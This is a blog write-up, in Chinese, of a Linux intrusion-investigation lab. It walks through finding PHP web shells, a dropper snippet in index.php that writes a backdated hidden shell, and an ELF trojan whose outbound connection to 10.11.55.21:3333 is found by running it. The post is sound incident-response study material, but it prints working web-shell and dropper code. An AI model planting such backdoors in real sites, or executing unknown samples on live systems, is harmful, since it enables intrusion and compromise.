第一章 应急响应-Linux入侵排查

1.web目录存在木马,请找到木马的密码提交

# 进入/var/www/html目录发现1.php,内容如下
<?php eval($_POST[1]);?>

flag{1}

2.服务器疑似存在不死马,请找到不死马的密码提交

# 找了半天实在是没看出来哪有什么不死马, 看了别人写的wp说.shell.php是不死马, 我实在还是觉得有点牵强, 这也能算不死马
# 其内容如下:
<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

flag{hello}

3.不死马是通过哪个文件生成的,请提交文件名

# 生成.shell.php的文件大概率会包含.shell.php的关键字, 因为需要把内容写入这个文件名的文件, 从index.php中找到了代码片段
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
# 这我看了确认确实不能算不死马

flag{index.php}

4.黑客留下了木马文件,请找出黑客的服务器ip提交

# 木马文件很明显为shell(1).elf, 先查看其进程PID
➜  ps -aux | grep "shell(1).elf"
root       891  0.0  0.0   6148   888 pts/1    S+   04:04   0:00 grep shell(1).elf
# 然后查看891进程对应的网络连接情况, 但是结果为空了
➜  netstat -ano | grep 891
# 直接下载下来拖进微步云沙箱, 得到外联ip

flag{10.11.55.21}

5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

# 因为在第4问拿微步云沙箱没看出来黑客服务器开启的监听端口, 然后我找了半天历史的tcp连接记录也没找到, 看了别人的wp
# 发现要先执行, 这说实话还是有点牵强, 不是沙箱谁敢执行....正常操作应该是把文件打包下来在沙箱环境进行二进制样本分析。
# 但是反正是靶机环境, 就直接执行了
➜  cd /var/www/html
➜  ls
 1.php   admin     config.php   favicon.ico   index.php     LICENSE    README.md  'shell(1).elf'   template
 1.tar   api.php   data         include       install.php   pictures   rss.php     sitemap.php     wap
➜  chmod +x shell\(1\).elf
➜  ./shell\(1\).elf
# 然后新起一个终端查看网路连接情况
➜  ss -nt
State           Recv-Q        Send-Q               Local Address:Port                Peer Address:Port
ESTAB           0             36                       10.0.10.3:22                   113.57.8.68:38072
SYN-SENT        0             1                        10.0.10.3:37552                10.11.55.21:3333

flag{3333}
posted @ 2024-07-31 12:31  Fxe0_0  阅读(21)  评论(0)    收藏  举报